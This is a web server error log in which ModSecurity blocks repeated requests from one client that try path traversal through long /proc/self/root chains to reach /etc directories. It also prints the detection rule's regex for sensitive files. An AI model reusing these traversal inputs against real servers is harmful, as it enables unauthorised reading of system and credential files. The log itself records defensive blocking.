[Fri Mar 20 08:03:59.950932 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.243.128:55022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pn11pVZ5mVmJwsFMyPQAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:04:07.101138 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:58184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ppxCii7xarUs8iHZo0AAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:04:08.394894 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.243.128:58192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pqBCii7xarUs8iHZo0QAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:04:15.399193 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:52526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pr_qxLDW4GITHUkTokAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:04:18.879876 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.243.128:52538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0psvXLqtnMIWvjpaKb3wAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:04:23.557355 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:47760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pt-oXxyEfFpUF8f-B2QAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:04:24.902364 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.243.128:47764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0puPqxLDW4GITHUkTonQAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:04:28.347211 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:47770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pvOoXxyEfFpUF8f-B4AAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:04:30.762859 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:33680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pvjJ3M9BSuKP7CAYcjAAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:04:46.250993 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.244.43:44168] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0pzjJ3M9BSuKP7CAYcmgAAAIo"]
[Fri Mar 20 08:05:21.018938 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:33688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0p8TJ3M9BSuKP7CAYcygAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:05:23.360227 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:57346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0p89a6ubjKNq_cu4bWAgAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:05:24.796647 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:57356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0p9OoXxyEfFpUF8f-B9AAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:05:38.166018 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:57358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qAta6ubjKNq_cu4bWEwAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:05:53.136764 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:58606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qEeoXxyEfFpUF8f-CDAAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:06:07.012388 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.243.128:59090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qH7ninkcc-iUj5ApgBAAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:06:12.702455 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.243.128:39964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qJLninkcc-iUj5ApgEAAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:06:17.292559 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:60890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qKda6ubjKNq_cu4bWNwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:06:19.607888 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.243.128:60892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qK_HIg5MgXLBnicP44QAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:06:23.060606 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:52044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qL-oXxyEfFpUF8f-CFwAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:06:35.149559 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.243.128:52050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qO11pVZ5mVmJwsFMyiwAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:06:36.499636 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:41060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0qPDJ3M9BSuKP7CAYdEAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
